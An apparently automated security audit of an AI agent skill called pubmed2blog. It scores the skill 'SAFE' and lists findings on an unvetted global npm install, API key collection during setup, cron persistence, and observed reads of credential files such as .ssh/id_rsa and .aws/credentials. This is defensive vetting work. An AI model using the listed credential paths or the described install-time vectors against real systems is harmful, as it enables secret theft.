Is holic101/pubmed2blog safe?

https://github.com/openclaw/skills/tree/main/skills/holic101/pubmed2blog

84
SAFE

The pubmed2blog skill's SKILL.md is clean: it contains no prompt injection, no hidden instructions, no embedded URLs for autonomous fetching, and no obfuscation techniques. The primary risk is indirect — the npm install -g pubmed2blog install directive installs an unvetted global npm package whose preinstall/postinstall scripts were never executed in the sandbox, meaning any malicious install-time code would remain unobserved. Additionally, the pubmed2blog init API key setup flow and the unvetted Z.AI provider represent plausible credential harvesting and content exfiltration vectors if the npm package is compromised. Canary file integrity was confirmed clean throughout.

Category Scores

Prompt Injection 92/100 · 30%
Data Exfiltration 80/100 · 25%
Code Execution 72/100 · 20%
Clone Behavior 92/100 · 10%
Canary Integrity 95/100 · 10%
Behavioral Reasoning 75/100 · 5%

Findings (5)

MEDIUM Unvetted global npm package install -28

The skill's install directive runs npm install -g pubmed2blog, installing a third-party npm package globally under user privileges. The npm package was not executed during sandbox testing, so its preinstall/postinstall scripts were never observed. A malicious postinstall hook could perform arbitrary code execution, credential theft, or backdoor installation silently at install time.

MEDIUM API key collection via interactive init command -12

The pubmed2blog init command is described as 'Interactive setup for API keys and preferences' supporting Anthropic, OpenAI, and Z.AI providers. If the underlying npm package is malicious or compromised, running init would deliver live API credentials directly to attacker-controlled infrastructure. An agent following the skill's usage instructions would naturally run init as part of setup.

LOW Unvetted third-party AI provider (Z.AI) -8

The skill advertises Z.AI as a supported inference provider alongside Anthropic and OpenAI. Z.AI is not a widely recognized provider, and healthcare blog content generated through this provider would be transmitted to unknown infrastructure. Patient-facing articles could contain sensitive medical context.

LOW Cron scheduling creates persistence vector if npm package is malicious -10

The skill explicitly instructs agents to 'Schedule via cron for regular content generation.' While legitimate for the stated use case, if the installed pubmed2blog binary is malicious, an agent following this instruction would establish a persistent execution foothold that survives session termination.

INFO Credential file accesses observed but attributed to monitoring framework -5

auditd PATH records show .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and .config/gcloud/application_default_credentials.json were opened at two points during the audit. Both access clusters occur at identical millisecond timestamps (all six files at 1771934673.087 and again at 1771934696.052), consistent with the oathe monitoring system's pre-install baseline read and post-install comparison scan rather than the skill or npm package. Canary integrity confirmed clean.